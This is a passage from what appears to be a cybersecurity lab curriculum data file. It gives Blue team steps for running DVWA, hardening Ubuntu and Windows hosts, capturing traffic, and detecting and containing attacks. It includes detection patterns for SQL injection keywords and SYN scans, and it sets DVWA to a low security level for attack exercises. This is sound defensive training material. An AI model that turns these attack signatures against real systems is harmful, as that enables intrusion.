        troubleshooting: 'Blocked? On the Windows host enable Remote Desktop (System > Remote Desktop) and allow it through Windows Firewall.',
      },
      {
        id: 'blue-w0-s3',
        title: 'Snapshot Before Hardening',
        description: 'Capture a restore point on both VMs before changing anything.',
        instruction: 'In your hypervisor, take a snapshot named "pre-hardening" of BOTH the Ubuntu and Windows VMs.',
        expectedOutput: 'Two "pre-hardening" snapshots',
        outputExplanation: 'Snapshots let you compare before/after and roll back safely if a change breaks something.',
        whatItMeans: 'You have a known-good baseline to measure your hardening against.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'No snapshot option? Power off the VM first, or use your hypervisor’s "clone" feature as a fallback.',
      },
      {
        id: 'blue-w0-s4',
        title: 'Run the DVWA Target (Docker)',
        description: 'Start Docker on the Ubuntu host and run DVWA — the vulnerable web app Red will attack.',
        instruction: 'On the Ubuntu host, install Docker, run the DVWA image as a NAMED container on port 80, then confirm it answers. Naming it "dvwa" lets you start/stop it later by name.',
        commands: [
          { cmd: 'sudo apt install -y docker.io', explain: 'Install the Docker engine. sudo runs as admin; -y auto-answers "yes" to the install prompt.' },
          { cmd: 'sudo systemctl enable --now docker', explain: 'Start Docker right now and set it to start on every boot (--now does both at once).' },
          {
            cmd: 'sudo docker run -d --name dvwa --restart unless-stopped -p 80:80 vulnerables/web-dvwa',
            explain: 'Download and run the DVWA target app in the background. This is the vulnerable site Red will attack and Blue will defend.',
            flags: [
              { flag: 'docker run', meaning: 'Create and start a new container from an image.' },
              { flag: '-d', meaning: 'Run it in the background (detached) so your terminal is free.' },
              { flag: '--name dvwa', meaning: 'Name the container "dvwa" so you can start/stop it by name later.' },
              { flag: '--restart unless-stopped', meaning: 'Automatically bring it back after a reboot.' },
              { flag: '-p 80:80', meaning: 'Connect host port 80 to the container’s port 80 so you can reach it in a browser.' },
              { flag: 'vulnerables/web-dvwa', meaning: 'The image to run — Damn Vulnerable Web App.' },
            ],
          },
          { cmd: 'curl -I http://localhost/', explain: 'Ask the site for just its response headers to confirm it is answering. -I = headers only.' },
        ],
        expectedOutput: 'HTTP/1.1 302 Found (redirect to /login.php); `docker ps` shows the dvwa container running',
        outputExplanation: 'A 200/302 response means DVWA is serving; browse to http://<UBUNTU_IP>/ and you should see the DVWA login page.',
        whatItMeans: 'The vulnerable target is live, so Red has something authorized to test and Blue has a real service to defend.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'Port 80 already in use? Stop the host web server (`sudo systemctl stop apache2`) or map another port, e.g. `-p 8080:80`. First run pulls the image, so give it a minute. Container exited? Check `sudo docker logs dvwa`. Name already in use? `sudo docker rm -f dvwa` then re-run.',
      },
      {
        id: 'blue-w0-s5',
        title: 'Initialize DVWA & Manage the Container',
        description: 'Set up the DVWA database and security level on first run, and learn to start/stop it.',
        instruction: 'In a browser on the lab network, open http://<UBUNTU_IP>/setup.php and click "Create / Reset Database". Log in with admin / password, then open the DVWA Security page and set the level to Low so standard payloads work. Use the commands below to start/stop the target on later days.',
        commands: [
          { cmd: 'sudo docker start dvwa', explain: 'Start the existing DVWA container (e.g. after a reboot).' },
          { cmd: 'sudo docker stop dvwa', explain: 'Stop DVWA when you are done for the day.' },
          { cmd: 'sudo docker ps', explain: 'List running containers — confirm "dvwa" is up.' },
          { cmd: 'sudo docker logs dvwa', explain: 'View the container logs if the page will not load.' },
        ],
        expectedOutput: 'DVWA database created; login works; Security shows "Low". `docker ps` lists dvwa as Up.',
        outputExplanation: 'After "Create / Reset Database" you can log in (admin / password) and reach the modules. Security = Low makes the SQLi/brute-force exercises behave as written.',
        whatItMeans: 'DVWA is fully initialized and you can bring the target up or down on demand, like a real service owner.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'setup.php blank or errors? Give the container a minute on first boot, then refresh. Login fails after reset? Use the defaults admin / password. Forgot the IP? `sudo docker ps` confirms it is running; browse from a VM on the same lab subnet.',
      },
    ],
  },
  {
    id: 'blue-w1-hardening',
    role: 'blue',
    week: 1,
    title: 'Baseline Hardening (Ubuntu + Windows)',
    objective: 'Harden both company servers — the Ubuntu web host and the Windows host — with essential controls.',
    frameworks: ['NIST_CSF', 'CIS'],
    deliverables: ['UFW_Status.txt', 'Lynis_Report.txt', 'Windows_Firewall.txt', 'Defender_Status.txt'],
    prerequisites: ["GRC's Hardening_Standard.md (what controls to apply)", 'SSH access to Ubuntu and RDP access to Windows (Week 0)'],
    definitionOfDone: ['Ubuntu: firewall on, fail2ban running, Lynis audited', 'Windows: Firewall on, Defender updated & scanned, SMBv1 disabled', 'Hardening_Checklist.txt reflects both hosts'],
    handoff: [{ to: 'grc', artifact: 'Hardening_Checklist.txt', note: 'Report what was hardened on both hosts for the policy baseline.' }],
    learn: ['Linux hardening: UFW, fail2ban, Lynis', 'Windows hardening: Windows Firewall, Defender, disabling SMBv1', 'Working across two operating systems'],
    tools: ['ufw', 'fail2ban', 'lynis', 'PowerShell', 'Microsoft Defender'],
    steps: [
      {
        id: 'blue-w1-s1',
        title: 'SSH Into Target',
        description: 'Establish secure connection to target server.',
        commands: [
          {
            cmd: 'ssh user@10.10.10.5',
            explain: 'Open an encrypted remote terminal on the Ubuntu server as the "user" account (it asks for that account\'s password). Replace user/IP with yours.',
            flags: [
              { flag: 'ssh', meaning: 'Open an encrypted remote shell (Secure Shell).' },
              { flag: 'user@10.10.10.5', meaning: 'Log in as "user" on this host — swap in your username and target IP.' },
            ],
          },
        ],
        expectedOutput: 'Shell prompt; whoami shows non-root user',
        outputExplanation: 'A changed prompt (e.g. `user@target:~$`) means you are in; `whoami` returning a non-root name confirms least-privilege access.',
        whatItMeans: 'You are connected as non-root (good security), can now apply hardening.',
        frameworks: ['NIST_CSF'],
        troubleshooting: '"Connection refused"? SSH isn\'t running on the target — start it: sudo systemctl start ssh (on the Ubuntu VM). "Permission denied"? Wrong username/password. First-connection "authenticity" prompt? Type yes. "No route to host"? Check the IP and that the target is on the lab network (ping it).',
      },
      {
        id: 'blue-w1-s2',
        title: 'Update System',
        description: 'Apply latest security patches.',
        commands: [
          { cmd: 'sudo apt update', explain: 'Refresh the list of available packages.' },
          { cmd: 'sudo apt upgrade -y', explain: 'Install all available updates (-y auto-confirms).' },
        ],
        commandExplanation: '`apt update` refreshes the package index; `apt upgrade -y` then installs all available updates with `-y` auto-confirming the prompts. `sudo` runs both as root.',
        commandFlags: [
          { flag: 'sudo', meaning: 'Run as root (required to change the system).' },
          { flag: 'apt update', meaning: 'Refresh the list of available packages.' },
          { flag: 'apt upgrade', meaning: 'Install the available updates.' },
          { flag: '-y', meaning: 'Auto-answer “yes” to prompts.' },
        ],
        expectedOutput: 'Packages updated',
        outputExplanation: 'Watch the summary line — "X upgraded, Y newly installed" — and make sure it finishes without errors, meaning known-vulnerable packages are now patched.',
        whatItMeans: 'Patches known vulnerabilities in OS and applications.',
        frameworks: ['CIS'],
        troubleshooting: '"Could not get lock /var/lib/dpkg/lock"? Another update is running — wait a minute and retry, or reboot. "Permission denied"? You forgot sudo. No network in the lab? apt update may fail to reach mirrors — that is expected offline; note it and continue.',
      },
      {
        id: 'blue-w1-s3',
        title: 'Configure Firewall',
        description: 'Enable UFW and allow only SSH and HTTP.',
        instruction: 'Run these one at a time on the Ubuntu host. UFW (Uncomplicated Firewall) decides what network traffic is allowed in. You start by blocking everything, then open only the ports you need.',
        commands: [
          { cmd: 'sudo ufw default deny incoming', explain: 'Set the default rule: block ALL incoming traffic. You then open only what you need — the safest starting point.' },
          { cmd: 'sudo ufw allow 22', explain: 'Open port 22 so you can still reach the server over SSH (remote terminal). Locking this out would cut off your own access.' },
          { cmd: 'sudo ufw allow 80', explain: 'Open port 80 so the website (HTTP) is reachable.' },
          { cmd: 'sudo ufw --force enable', explain: 'Turn the firewall on. --force skips the "are you sure?" prompt so it doesn’t hang.' },
          { cmd: 'mkdir -p ~/team-artifacts/week-1', explain: 'Make the week-1 folder to save your evidence into (safe to run again).' },
          { cmd: 'sudo ufw status verbose > ~/team-artifacts/week-1/UFW_Status.txt', explain: 'Save the active firewall rules to a file as evidence. > writes the output to that file.' },
        ],
        expectedOutput: 'UFW enabled, status shows SSH and HTTP allowed',
        outputExplanation: '`Firewall is active and enabled on system startup` confirms it is on; `ufw status` should then list only 22 and 80 as ALLOW.',
        whatItMeans: 'Restricts inbound traffic to only necessary services. Log this change in the Change Log form.',
        frameworks: ['CIS'],
        usesForm: 'Change Log',
        producesDeliverable: 'UFW_Status.txt',
        isEvidenceStep: true,
        troubleshooting: 'Locked yourself out over SSH? Always allow 22 BEFORE enabling — if stranded, fix it from the VM console. "ufw: command not found"? sudo apt install ufw. Status shows inactive? Re-run sudo ufw --force enable. Order matters: set default-deny and allow 22 first.',
      },
      {
        id: 'blue-w1-s4',
        title: 'Install Fail2Ban',
        description: 'Protect against brute force attacks.',
        commands: [
          { cmd: 'sudo apt install -y fail2ban', explain: 'Install fail2ban (bans IPs after repeated failed logins).' },
          { cmd: 'sudo systemctl enable --now fail2ban', explain: 'Start it now and on every boot.' },
        ],
        commandExplanation: '`apt install fail2ban` installs the intrusion-prevention tool; `systemctl enable` sets it to start automatically at every boot.',
        commandFlags: [
          { flag: 'apt install fail2ban', meaning: 'Install the brute-force protection tool.' },
          { flag: 'systemctl enable fail2ban', meaning: 'Start it automatically on every boot.' },
        ],
        expectedOutput: 'Fail2Ban running and enabled',
        outputExplanation: '`Created symlink ... fail2ban.service` confirms it is enabled; `systemctl status fail2ban` should read `active (running)`.',
        whatItMeans: 'Automatically blocks repeated failed login attempts. Record your hardening in the Hardening Baseline form.',
        frameworks: ['CIS'],
        usesForm: 'Hardening Baseline',
        isEvidenceStep: true,
        troubleshooting: '"Unit fail2ban.service not found" right after install? The package may still be finishing — wait, then re-run the enable line. Check it with sudo systemctl status fail2ban (expect active (running)) and sudo fail2ban-client status for active jails.',
      },
      {
        id: 'blue-w1-s5',
        title: 'System Audit with Lynis',
        description: 'Run comprehensive security audit.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-1', explain: 'Create the week-1 artifacts folder.' },
          { cmd: 'sudo lynis audit system | tee ~/team-artifacts/week-1/Lynis_Report.txt', explain: 'Run the full Lynis hardening audit and save the report.' },
        ],
        commandExplanation: '`lynis audit system` runs a comprehensive local security audit across files, services and config; `| tee ~/team-artifacts/week-1/Lynis_Report.txt` shows and saves the full output for review.',
        commandFlags: [
          { flag: 'lynis audit system', meaning: 'Run a full local security audit.' },
          { flag: '| tee ~/team-artifacts/week-1/Lynis_Report.txt', meaning: 'Show and save the audit output to the canonical file.' },
        ],
        expectedOutput: 'Hardening index score, warnings list',
        outputExplanation: 'The end shows a `Hardening index` (0–100) plus `Warnings` and `Suggestions` — the index tracks your progress and the warnings are your to-do list.',
        whatItMeans: 'Identifies remaining security gaps and compliance issues.',
        frameworks: ['NIST_CSF'],
        producesDeliverable: 'Lynis_Report.txt',
        isEvidenceStep: true,
        troubleshooting: '"lynis: command not found"? sudo apt install lynis. Run it with sudo so it can read protected config. The run is long — let it finish before reading the score. Report file empty? Check the ~/team-artifacts/week-1 folder exists (the mkdir line above creates it).',
      },
      {
        id: 'blue-w1-s6',
        title: 'Windows: Enable & Export the Firewall',
        description: 'Turn on Windows Firewall for all profiles and save its state (run in PowerShell as Administrator on the Windows host).',
        commands: [
          {
            cmd: 'Set-NetFirewallProfile -All -Enabled True',
            explain: 'Turn the Windows Firewall on for every profile. Type this in PowerShell (run as Administrator) and press Enter.',
            flags: [
              { flag: 'Set-NetFirewallProfile', meaning: 'The PowerShell command that changes Windows Firewall settings.' },
              { flag: '-All', meaning: 'Apply to all three profiles: Domain, Private, and Public.' },
              { flag: '-Enabled True', meaning: 'Switch the firewall ON (True = on, False = off).' },
            ],
          },
          {
            cmd: 'Get-NetFirewallProfile | Out-File Windows_Firewall.txt',
            explain: 'Read the firewall state back and save it to a file — this file is your evidence.',
            flags: [
              { flag: 'Get-NetFirewallProfile', meaning: 'Show the current firewall profile settings.' },
              { flag: '|', meaning: 'A "pipe" — sends the output of the left command into the command on the right.' },
              { flag: 'Out-File Windows_Firewall.txt', meaning: 'Write that output into a text file named Windows_Firewall.txt.' },
            ],
          },
        ],
        expectedOutput: 'All three profiles show Enabled: True',
        outputExplanation: 'Open Windows_Firewall.txt — Domain/Private/Public should each read `Enabled : True`.',
        whatItMeans: 'The Windows host now blocks unsolicited inbound traffic, like UFW does on Ubuntu.',
        frameworks: ['CIS'],
        producesDeliverable: 'Windows_Firewall.txt',
        isEvidenceStep: true,
        optional: true,
        troubleshooting: '“Access denied”? You must launch PowerShell with “Run as administrator”.',
      },
      {
        id: 'blue-w1-s7',
        title: 'Windows: Defender Scan & Disable SMBv1',
        description: 'Update and scan with Microsoft Defender, and remove the legacy SMBv1 protocol.',
        commands: [
          {
            cmd: 'Update-MpSignature',
            explain: 'Download the newest Microsoft Defender virus definitions so the scan catches recent threats. Run each of these one at a time in an Administrator PowerShell.',
            flags: [
              { flag: 'Update-MpSignature', meaning: 'Fetch the latest antivirus definition updates for Defender.' },
            ],
          },
          {
            cmd: 'Start-MpScan -ScanType QuickScan',
            explain: 'Run a quick antivirus scan of the most commonly infected areas.',
            flags: [
              { flag: 'Start-MpScan', meaning: 'Start a Microsoft Defender scan.' },
              { flag: '-ScanType QuickScan', meaning: 'Scan the high-risk areas only (fast). Alternatives: FullScan, CustomScan.' },
            ],
          },
          {
            cmd: 'Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart',
            explain: 'Remove SMBv1, an old file-sharing protocol famously exploited by WannaCry.',
            flags: [
              { flag: 'Disable-WindowsOptionalFeature', meaning: 'Turn off an optional Windows feature.' },
              { flag: '-Online', meaning: 'Apply to the running system (not an offline image).' },
              { flag: '-FeatureName SMB1Protocol', meaning: 'The feature to remove — the unsafe SMBv1 protocol.' },
              { flag: '-NoRestart', meaning: 'Do not reboot automatically (you can reboot later).' },
            ],
          },
          {
            cmd: 'Get-MpComputerStatus | Out-File Defender_Status.txt',
            explain: 'Save Defender’s current status to a file as your evidence.',
            flags: [
              { flag: 'Get-MpComputerStatus', meaning: 'Report Defender’s real-time protection status.' },
              { flag: '| Out-File Defender_Status.txt', meaning: 'Send that report into a text file named Defender_Status.txt.' },
            ],
          },
        ],
        expectedOutput: 'Defender_Status.txt shows real-time protection on; SMB1 removed',
        outputExplanation: '`AMServiceEnabled : True` and `RealTimeProtectionEnabled : True` confirm Defender is active; SMBv1 should no longer be listed as enabled.',
        whatItMeans: 'Antivirus is current and a classic wormable protocol (SMBv1) is gone.',
        frameworks: ['CIS', 'NIST_CSF'],
        producesDeliverable: 'Defender_Status.txt',
        isEvidenceStep: true,
        optional: true,
        troubleshooting: 'If SMBv1 is already removed the command is a no-op — that is fine. A reboot may be needed to fully apply.',
      }
    ]
  },
  {
    id: 'blue-w2-baseline',
    role: 'blue',
    week: 2,
    title: 'Baseline Capture & Detection Engineering (Linux + Windows)',
    objective: 'Capture normal traffic, design detection rules, and turn on Windows event logging.',
    frameworks: ['NIST_CSF', 'NIST_800_115'],
    deliverables: ['Baseline_Traffic.pcap', 'Attack_Traffic.pcap', 'Wireshark_Filters.txt', 'Detection_Rules.txt', 'Win_EventLog.txt'],
    prerequisites: ["GRC's VM_SOP.md (what to monitor and how)", 'Week 1 hardening complete on both hosts'],
    definitionOfDone: ['A clean baseline.pcap is captured', 'Detection filters written', 'Windows security/PowerShell logging is enabled and exported'],
    handoff: [{ to: 'grc', artifact: 'Detection_Rules.txt', note: 'Report the detections now in place for the VM SOP.' }],
    learn: ['Packet capture & baselining with tcpdump/Wireshark', 'Writing detection filters', 'Enabling & reading Windows Event Logs (Sysmon/PowerShell)'],
    tools: ['tcpdump', 'Wireshark', 'Windows Event Viewer', 'PowerShell (Get-WinEvent)'],
    steps: [
      {
        id: 'blue-w2-s1',
        title: 'Capture Normal Traffic',
        description: 'Record baseline traffic while accessing application normally.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-2', explain: 'Create the week-2 artifacts folder.' },
          { cmd: 'sudo tcpdump -i eth0 -w ~/team-artifacts/week-2/Baseline_Traffic.pcap', explain: 'Capture traffic on eth0 to a pcap for your baseline (Ctrl-C to stop).' },
        ],
        commandExplanation: '`tcpdump` captures network packets; `-i eth0` selects the interface to sniff and `-w baseline.pcap` writes raw packets to a file (instead of printing them) for later analysis.',
        commandFlags: [
          { flag: 'tcpdump', meaning: 'Capture network packets.' },
          { flag: '-i eth0', meaning: 'Capture on the eth0 interface.' },
          { flag: '-w ~/team-artifacts/week-2/Baseline_Traffic.pcap', meaning: 'Write raw packets to the canonical baseline file.' },
        ],
        expectedOutput: 'PCAP file with normal HTTP requests',
        outputExplanation: 'It prints `listening on eth0...` and a rising packet count; stop with Ctrl-C — the resulting `baseline.pcap` holds your normal-traffic sample.',
        whatItMeans: 'Establishes pattern of legitimate traffic for comparison.',
        frameworks: ['NIST_800_115'],
        producesDeliverable: 'Baseline_Traffic.pcap',
        isEvidenceStep: true,
        troubleshooting: 'Permission error? tcpdump needs sudo. "eth0: No such device"? List your interfaces with ip a and use the right name (it may be ens33, enp0s3, etc.). Empty capture? Generate some traffic (ping/curl the target) while it runs, then press Ctrl+C to stop.',
      },
      {
        id: 'blue-w2-s2',
        title: 'Analyze Baseline in Wireshark',
        description: 'Study normal traffic patterns and timing.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-2', explain: 'Create the week-2 artifacts folder.' },
          { cmd: 'printf "http.request\\ntcp.flags.syn==1 && tcp.flags.ack==0\\n" > ~/team-artifacts/week-2/Wireshark_Filters.txt', explain: 'Save two display filters (HTTP requests; lone-SYN scan packets) to a file.' },
          { cmd: 'wireshark ~/team-artifacts/week-2/Baseline_Traffic.pcap &', explain: 'Open the capture in Wireshark in the background.' },
        ],
        commandExplanation: 'Opens the capture in the Wireshark GUI (the `&` frees your terminal); typing `http.request` in the display-filter bar shows only outbound HTTP requests.',
        commandFlags: [
          { flag: 'wireshark baseline.pcap', meaning: 'Open the capture in the GUI analyzer.' },
          { flag: '&', meaning: 'Run it in the background so the terminal is free.' },
          { flag: 'http.request', meaning: 'Display filter: show only HTTP requests.' },
        ],
        expectedOutput: 'Sequential requests, normal request rate, complete handshakes',
        outputExplanation: 'You should see steady, evenly-spaced requests and complete TCP handshakes (SYN, SYN-ACK, ACK) — this is what "normal" looks like for later comparison.',
        whatItMeans: 'Understand what normal looks like to detect anomalies.',
        frameworks: ['NIST_CSF'],
        producesDeliverable: 'Wireshark_Filters.txt',
        isEvidenceStep: true,
        troubleshooting: '"wireshark: command not found"? sudo apt install wireshark. Running as root warns you — that is fine in a lab. No packets shown? Confirm you opened the right .pcap and cleared any display filter. The & returns your prompt immediately; that is expected.',
      },
      {
        id: 'blue-w2-s3',
        title: 'Create Detection Filters',
        description: 'Write Wireshark filters for common attack patterns.',
        command: 'echo "Filter 1: tcp.flags.syn==1 && tcp.flags.ack==0 (SYN scan)" > ~/team-artifacts/week-2/Detection_Rules.txt',
        commandExplanation: '`echo ... > ~/team-artifacts/week-2/Detection_Rules.txt` saves a Wireshark display filter to the canonical file; `tcp.flags.syn==1 && tcp.flags.ack==0` matches lone SYN packets — the signature of a port scan.',
        commandFlags: [
          { flag: 'tcp.flags.syn==1', meaning: 'Match packets with the SYN flag set.' },
          { flag: 'tcp.flags.ack==0', meaning: '…and the ACK flag clear — a lone SYN means a scan.' },
          { flag: '> ~/team-artifacts/week-2/Detection_Rules.txt', meaning: 'Save the detection rule to the canonical file.' },
        ],
        expectedOutput: 'No screen output — the filter is written to Detection_Rules.txt',
        outputExplanation: 'Because of the `>` redirect the terminal prints nothing; run `cat ~/team-artifacts/week-2/Detection_Rules.txt` to confirm the rule is saved, ready to paste into Wireshark during an attack.',
        whatItMeans: 'Filters enable rapid identification of suspicious activity.',
        frameworks: ['NIST_CSF'],
        producesDeliverable: 'Detection_Rules.txt',
        isEvidenceStep: true,
        troubleshooting: 'Nothing happened? That is correct — `>` sends the text to the file, not the screen. If cat shows nothing, the folder may be missing (run the mkdir step first) or you used a single `>` twice and overwrote it — use `>>` to append more filters.',
      },
      {
        id: 'blue-w2-s4',
        title: 'Windows: Enable & Export Security Logging',
        description: 'Turn on auditing of logon events and export recent security logs (PowerShell as Administrator on the Windows host).',
        commands: [
          {
            cmd: 'auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable',
            explain: 'Tell Windows to record both successful and failed logons. Run in an Administrator PowerShell.',
            flags: [
              { flag: 'auditpol /set', meaning: 'Change the audit (logging) policy.' },
              { flag: '/category:"Logon/Logoff"', meaning: 'The category to audit — login and logout events.' },
              { flag: '/success:enable /failure:enable', meaning: 'Log both successful logons and failed attempts.' },
            ],
          },
          {
            cmd: 'Get-WinEvent -LogName Security -MaxEvents 50 | Format-Table TimeCreated,Id,Message -Auto | Out-File Win_EventLog.txt',
            explain: 'Read the 50 most recent Security-log events and save them as your baseline evidence.',
            flags: [
              { flag: 'Get-WinEvent -LogName Security', meaning: 'Read entries from the Windows Security event log.' },
              { flag: '-MaxEvents 50', meaning: 'Take only the 50 newest events.' },
              { flag: '| Format-Table TimeCreated,Id,Message -Auto', meaning: 'Lay the events out as a readable table with those columns.' },
              { flag: '| Out-File Win_EventLog.txt', meaning: 'Save the table to a text file.' },
            ],
          },
        ],
        expectedOutput: 'Win_EventLog.txt with recent logon events (Event ID 4624/4625)',
        outputExplanation: 'Event ID 4624 = successful logon, 4625 = failed logon. Capturing these now means Red’s brute-force attempts will show up next week.',
        whatItMeans: 'Windows now records who logs in (and who fails), the basis for detection.',
        frameworks: ['NIST_CSF', 'NIST_800_115'],
        producesDeliverable: 'Win_EventLog.txt',
        isEvidenceStep: true,
        optional: true,
        troubleshooting: 'No events? Generate one by logging off/on, then re-run the Get-WinEvent line.',
      },
      {
        id: 'blue-w2-s5',
        title: 'Capture a Labeled Attack Sample',
        description: 'Record a short capture while generating scan/login noise, to keep alongside the baseline.',
        instruction: 'Start a capture, run a quick nmap/login against your own host, then let it stop.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-2', explain: 'Create the week-2 artifacts folder.' },
          { cmd: 'sudo tcpdump -i eth0 -c 200 -w ~/team-artifacts/week-2/Attack_Traffic.pcap', explain: 'Capture 200 packets of attack traffic to a pcap, then stop.' },
        ],
        commandExplanation: '`tcpdump -c 200` captures 200 packets to Attack_Traffic.pcap so you have an abnormal sample to compare against the baseline.',
        commandFlags: [
          { flag: '-c 200', meaning: 'Capture 200 packets then stop automatically.' },
          { flag: '-w ~/team-artifacts/week-2/Attack_Traffic.pcap', meaning: 'Write the sample to the canonical file.' },
        ],
        expectedOutput: 'Attack_Traffic.pcap created',
        outputExplanation: 'A `.pcap` of ~200 packets appears; opened in Wireshark it should show the scan/login noise your filters target.',
        whatItMeans: 'Gives you an abnormal-traffic reference so detection filters can be validated before the real attack.',
        frameworks: ['NIST_800_115'],
        producesDeliverable: 'Attack_Traffic.pcap',
        isEvidenceStep: true,
        troubleshooting: 'Capture stops instantly with 0 packets? Nothing was flowing — start your nmap/login against the host right after you press Enter. Wrong interface? Use the name from ip a (ens33/enp0s3). Needs sudo.',
      }
    ]
  },
  {
    id: 'blue-w3-detection',
    role: 'blue',
    week: 3,
    title: 'Live Detection & Response (Linux + Windows)',
    objective: 'Detect attacks as they happen on both hosts and respond with containment per the IR runbook.',
    frameworks: ['NIST_CSF', 'NIST_800_61'],
    deliverables: ['Attack_Pcap.pcap', 'Attack_Logs.txt', 'Containment_Actions.txt', 'Win_Detection.txt'],
    prerequisites: ["GRC's IR_Runbook.md (follow it during the breach)", 'Capture/logging from Week 2 running on both hosts'],
    definitionOfDone: ['Attack traffic captured', 'SQL-injection attempt detected in Linux logs', 'Windows failed-logon spike detected', 'Attacker contained on both hosts'],
    handoff: [{ to: 'grc', artifact: 'Incident_Response.txt', note: 'Submit IR notes and logs for chain of custody.' }],
    learn: ['Live triage from packets and logs', 'Detecting brute force on Windows (Event ID 4625)', 'Containment on Linux (UFW) and Windows (firewall rule)'],
    tools: ['tcpdump', 'tail/grep', 'PowerShell (Get-WinEvent)', 'Windows Firewall'],
    steps: [
      {
        id: 'blue-w3-s1',
        title: 'Start Live Packet Capture',
        description: 'Begin recording before Red starts attacks.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-3', explain: 'Create the week-3 artifacts folder.' },
          { cmd: 'sudo tcpdump -i eth0 -w ~/team-artifacts/week-3/Attack_Pcap.pcap', explain: 'Start capturing attack traffic to a pcap before Red begins.' },
        ],
        commandExplanation: 'Same packet capture as the baseline, started *before* the Red team attacks so every malicious packet is recorded to `attack_capture.pcap`.',
        commandFlags: [
          { flag: 'tcpdump', meaning: 'Capture network packets.' },
          { flag: '-i eth0', meaning: 'Capture on the eth0 interface.' },
          { flag: '-w ~/team-artifacts/week-3/Attack_Pcap.pcap', meaning: 'Write packets to the canonical attack-capture file.' },
        ],
        expectedOutput: 'Capture running, file growing',
        outputExplanation: '`listening on eth0` plus a climbing packet count means it is recording; verify the `.pcap` file size grows as traffic arrives.',
        whatItMeans: 'Forensic evidence collection; chain of custody begins.',
        frameworks: ['NIST_800_61'],
        producesDeliverable: 'Attack_Pcap.pcap',
        isEvidenceStep: true,
        troubleshooting: 'Start this BEFORE Red attacks, or you miss the evidence. Needs sudo. Leave it running in its own terminal; the file grows as packets arrive — do not Ctrl+C until the attack window is over. Wrong interface? Use the name from ip a.',
      },
      {
        id: 'blue-w3-s2',
        title: 'Monitor Logs in Real Time',
        description: 'Watch system and web server logs.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-3', explain: 'Create the week-3 artifacts folder.' },
          { cmd: 'tail -n 200 /var/log/apache2/access.log | tee ~/team-artifacts/week-3/Attack_Logs.txt', explain: 'Save the last 200 web-server log lines as evidence.' },
        ],
        commandExplanation: '`tail -f` prints the end of the Apache access log and then *follows* it, streaming each new request live as it is written.',
        commandFlags: [
          { flag: 'tail', meaning: 'Show the end of a file.' },
          { flag: '-f', meaning: 'Follow — stream new lines as they are written.' },
          { flag: '/var/log/apache2/access.log', meaning: 'The Apache request log to watch.' },
        ],
        expectedOutput: 'HTTP requests, errors, failed auth attempts',
        outputExplanation: 'Each line is one HTTP request (IP, time, method, URL, status). A burst of requests or repeated 401/404s flags attacker activity in real time.',
        whatItMeans: 'Real-time visibility into attacker activity.',
        frameworks: ['NIST_CSF'],
        producesDeliverable: 'Attack_Logs.txt',
        isEvidenceStep: true,
        troubleshooting: '"No such file or directory"? DVWA in Docker logs elsewhere — try /var/log/apache2/access.log inside the container (sudo docker logs dvwa) or the host path you mapped. Permission denied? Use sudo. Nothing new appearing? Generate a request (browse the site) to produce a log line.',
      },
      {
        id: 'blue-w3-s3',
        title: 'Detect SQL Injection Pattern',
        description: 'Identify SQL injection attempt in logs.',
        command: 'grep -i "union\\|select" /var/log/apache2/access.log',
        commandExplanation: '`grep -i` searches the log case-insensitively; the pattern `union\\|select` matches either SQL keyword, surfacing requests that look like SQL injection.',
        commandFlags: [
          { flag: 'grep', meaning: 'Search text for a pattern.' },
          { flag: '-i', meaning: 'Case-insensitive match.' },
          { flag: 'union\\|select', meaning: 'Match either SQL keyword (\\| means OR).' },
        ],
        expectedOutput: 'SQL keywords in request URLs',
        outputExplanation: 'Any matching line contains `UNION`/`SELECT` inside a URL — legitimate users never send SQL, so these confirm an injection attempt and give you the attacker IP.',
        whatItMeans: 'Confirms SQL injection attack attempt. Write up the incident in the Incident Report form.',
        frameworks: ['OWASP', 'NIST_800_61'],
        usesForm: 'Incident Report',
        isEvidenceStep: true,
        troubleshooting: 'No matches? The attack may not have run yet, the keywords may be URL-encoded (try grep -iE "union|select|%27|0x"), or the log path differs (see the previous step). Case matters — keep -i. Escape the pipe as \\| inside quotes.',
      },
      {
        id: 'blue-w3-s4',
        title: 'Block Attacker IP',
        description: 'Use firewall to deny further traffic from attacker.',
        commands: [
          { cmd: 'sudo ufw deny from 10.10.10.x', explain: 'Block all traffic from the attacker IP at the firewall.' },
          { cmd: 'echo "$(date +%F\\ %T) Blocked 10.10.10.x via UFW after SQLi/brute force" >> ~/team-artifacts/week-3/Containment_Actions.txt', explain: 'Append a timestamped containment note to your action log.' },
        ],
        commandExplanation: '`ufw deny from <ip>` inserts a firewall rule that drops all traffic from the attacker address — an immediate containment action.',
        commandFlags: [
          { flag: 'ufw deny from', meaning: 'Add a rule that drops all traffic from an address.' },
          { flag: '10.10.10.x', meaning: 'The attacker IP to block.' },
        ],
        expectedOutput: 'UFW rule added',
        outputExplanation: '`Rule added` confirms it; `ufw status` now lists a DENY entry for that IP and the attacker requests stop appearing in the logs.',
        whatItMeans: 'Containment action stops ongoing attacks.',
        frameworks: ['NIST_800_61'],
        producesDeliverable: 'Containment_Actions.txt',
        isEvidenceStep: true,
        troubleshooting: 'Use the REAL attacker IP you found in the logs (not the literal 10.10.10.x). "ERROR: Bad source address"? Check the IP format. Rule not taking effect? Confirm UFW is enabled (sudo ufw status). To undo later: sudo ufw delete deny from <ip>.',
      },
      {
        id: 'blue-w3-s5',
        title: 'Windows: Detect Brute Force & Contain',
        description: 'Spot the failed-logon spike on Windows and block the source (PowerShell as Administrator).',
        commands: [
          {
            cmd: 'Get-WinEvent -FilterHashtable @{LogName="Security";Id=4625} -MaxEvents 20 | Out-File Win_Detection.txt',
            explain: 'Pull the recent failed-logon events (Event ID 4625) — a burst of these is the signature of a brute-force attack — and save them as evidence.',
            flags: [
              { flag: 'Get-WinEvent', meaning: 'Read the Windows event log.' },
              { flag: '-FilterHashtable @{LogName="Security";Id=4625}', meaning: 'Filter to Security-log events with ID 4625 (failed logon).' },
              { flag: '-MaxEvents 20', meaning: 'Take the 20 most recent matching events.' },
